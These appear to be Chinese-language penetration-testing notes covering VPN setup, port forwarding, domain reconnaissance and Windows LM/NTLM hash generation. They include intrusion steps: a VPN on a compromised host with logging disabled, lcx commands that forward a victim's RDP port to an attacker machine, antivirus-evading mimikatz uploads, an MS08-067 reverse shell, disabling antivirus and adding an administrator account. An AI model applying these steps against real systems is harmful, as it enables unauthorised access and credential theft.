一、web渗透必备技术

VPN

虚拟专用网络，该技术提供了一种通过公用网络安全地对企业内部专用网络进行远程访问的连接方式。分为软件VPN与硬件VPN

三个基本要素：

IP封装:即一个IP包包含其他IP包

加密的身份认证:安全有效地验证远程用户的身份

数据有效负载加密：加密被封装的数据

VPN服务器

一般建立独立的vpn服务器，或者在肉鸡上建立vpn服务器（权限尽量低）

当然了，肉鸡不一定能遇上，所以一般会使用现成的VPN软件。

win 2003 server创建 vpn服务器

1.管理工具->路由和远程访问

2.启动路由和远程访问

3.关闭防火墙

4.配置并启用路由和远程访问

5.选择启用的服务：VPN访问、NAT和基本防火墙

6.配置NAT/基本防火墙->选择接口 （选择本地连接，该IP地址必须是互联网独立IP地址）

7.公用接口上启用NAT

8.启用远程访问和路由(LAN,远程)

9.配置日志（不记录任何事件），重启路由器

10.授权用户远程访问：本地用户和组的test用户（尽量是低权限的普通用户），在“拨入”窗口中，选择允许访问即可。

netstat -an | Find “1723” 可查看VPN服务是否开启

端口转发

场景

局域网的某主机只开放了Web服务，只有内网的机器才能访问到

利用

想办法将肉鸡A的3389打开，通过端口转发工具(如lcx)端口映射到具有外网IP地址的B机上，进而攻击者在本地连接到被控主机的远程终端

演示

1.在靶机端，输入

lcx -slave xxxxx 51 yyyy 3389

即将靶机yyyy的3389端口转发到远程地址xxxx的51端口

2.在攻击机端

lcx -lister 51 3389

在攻击机端监听51端口，接收被控端3389端口转发来的数据

这个原理，与瑞士军刀netcat，一样吧

3.在攻击机端的命令行输入mstsc，弹出远程桌面连接窗口，输入127.0.0.1连接，输入用户名和密码进行连接

域名查询

顶级域名

.com .net .org

二级域名

.edu .gov

在渗透中的作用

域名地址定位；IP地址查询域名注册情况

查询方式

IP地址反查域名注册情况；域名查IP

推荐网址

whois；站长之家

子域名查询

已知baidu.com

那么可能有email.baidu.com ; www. baidu.com……

运用工具layer子域名挖掘机或oneforall，通过字典去枚举即可

旁站查询

主目标网站渗透未果，则扫描相同IP地址段下的其他IP（一般是C段扫描），对其他IP地址渗透。

渗透成功后，通过嗅探等手段截获目标网站密码。

获取windows系统的Hash密码

windows系统的Hash密码主要由LM-HASH和NTLM-HASH两部分组成。攻击者如果获取了系统的HASH值，通过彩虹表等手段获取到系统的密码。

Hash基本知识

散列，或哈希；散列算法，使得输入值变换成固定长度的输出，称为散列值。由于算法的碰撞性（应该是这个吧），不同的输入是有可能散列成相同的输出的，所以，散列值和输入值不是一一对应的。

它应用于信息安全领域中的加密算法，将不同长度的信息转化成杂乱的128位的编码中。

Hash算法在密码上的应用

常见的MD5、SHA1

应用主要是：

1.文件校验

2.数字签名

3.鉴权协议（挑战-认证模式）

windows下Hash密码值

1.Hash密码格式

用户名称:RID:LM-Hash:NTLM-Hash

如:

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC

2.LM-Hash生成原理

以输入为:welcome为例

先全转化为大写:

WELCOME

——>

再变成十六进制字符串 (若不足14字节，0x00去补)：

57454C434F4D4500000000000000

——>

分割成两组7字节数据，分别用str_to_key()函数处理得到两组8字节数据

57454C434F4D45 -str_to_key()-> 56A25288347A348A
00000000000000 -str_to_key()-> 0000000000000000

——>

这两组8字节数据将做为DESKEY对魔术字符串“KGS!@#$%”进行标准DES加密

“KGS!@#$%” -> 4B47532140232425
56A25288347A348A -对4B47532140232425进行标准DES加密-> C23413A8A1E7665F
0000000000000000 -对4B47532140232425进行标准DES加密-> AAD3B435B51404EE

将加密后的这两组数据简单拼接，就得到了最后的LM Hash

LM Hash: C23413A8A1E7665FAAD3B435B51404EE

3.NTLM-Hash生成原理

以输入为:123456为例

先转换成unicode字符串(无需补足14字节)

MD4固定产生128bit哈希值

与LM-Hash相比，明文口令大小写敏感；摆脱了魔术字符串；MD4是真正的单向哈希函数

获取密码工具

gethashes（System权限下），和mimikatz

一般都是免杀上传到靶机上去，运行获得靶机的hash值，如果是域控的话，那就获得了很多账号密码了。

经验

Ms08067漏洞利用工具获得漏洞主机的反弹shell，上传工具，执行命令。

1.获得反弹shell后，尝试查看系统是否有杀毒软件，并试图关闭，关不了，放弃这一步

2.看是否能开启3389远程终端，利用该端口，直接添加一个具有管理员权限用户，本地登录到该系统